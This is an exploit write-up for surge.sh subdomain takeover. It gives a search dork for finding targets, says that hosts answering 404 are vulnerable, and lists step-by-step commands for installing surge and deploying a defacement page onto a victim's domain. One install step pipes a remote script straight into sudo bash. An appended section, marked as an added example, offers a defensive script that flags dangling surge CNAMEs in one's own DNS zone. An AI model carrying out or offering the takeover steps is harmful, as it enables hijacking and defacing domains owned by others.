Exploit title: Surge Domain/Subdomain Takeover
Author : Security007
Vendor Homepage : surge.sh
Tested on : Windows 10 x64
Dork : intext:powered by surge.sh
Find The target:
--> Dorking with search engine
--> Check the HTTP response status code. Note: only hosts that return a 404 status code are vulnerable.
How to exploit this?
First: install nodejs
--> curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
--> sudo apt-get install -y nodejs
Second: install surge
--> sudo npm install --global surge (if npm is not installed, install it first)
make a new directory:
--> mkdir takeover
open the directory:
--> cd takeover
make a defacement page and save as index.html:
--> nano index.html
exploit it:
--> surge --domain target.com
Video :
https://youtu.be/-i6cQuluXbY
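Defender-side check for the condition described under "Find The target": a hostname in your own zone that still points at surge.sh while the site behind it answers 404. This is an added example, not part of the original write-up; the zone export layout, probe table, hostnames and function names are constructed assumptions.

```shell
#!/bin/sh
# Added example: all hostnames, records and status codes are constructed.

# Constructed zone export, one record per line: name TTL class type target
sample_zone() {
cat <<'EOF'
www.example.test.   300 IN CNAME site-a.surge.sh.
docs.example.test.  300 IN CNAME site-b.surge.sh.
blog.example.test.  300 IN CNAME pages.example.net.
old.example.test.   300 IN CNAME OLD-DEMO.SURGE.SH.
mail.example.test.  300 IN A     192.0.2.10
EOF
}

# Constructed probe results: host and HTTP status. For your own hosts these
# could be collected with: curl -s -o /dev/null -w '%{http_code}' "http://$host/"
sample_probes() {
cat <<'EOF'
www.example.test 200
docs.example.test 404
blog.example.test 404
old.example.test 404
EOF
}

# dangling_surge ZONE_FILE PROBE_FILE
# Prints every name whose CNAME target is surge.sh (or below it) and whose
# probe returned 404, i.e. DNS still delegates to a project that is gone.
dangling_surge() {
  awk 'NR == FNR { status[tolower($1)] = $2; next }   # first file: probes
       toupper($4) == "CNAME" {                        # second file: zone
         t = tolower($5); sub(/\.$/, "", t)            # normalise target
         h = tolower($1); sub(/\.$/, "", h)            # normalise owner name
         if ((t == "surge.sh" || t ~ /\.surge\.sh$/) && status[h] == "404")
           print h
       }' "$2" "$1"
}

# Demo run on the constructed data.
tmp=$(mktemp -d)
sample_zone > "$tmp/zone"
sample_probes > "$tmp/probes"
dangling_surge "$tmp/zone" "$tmp/probes"
rm -rf "$tmp"
```

Each name it prints is a stale record: remove the DNS entry or republish the project under your own surge account so the name cannot be claimed by someone else.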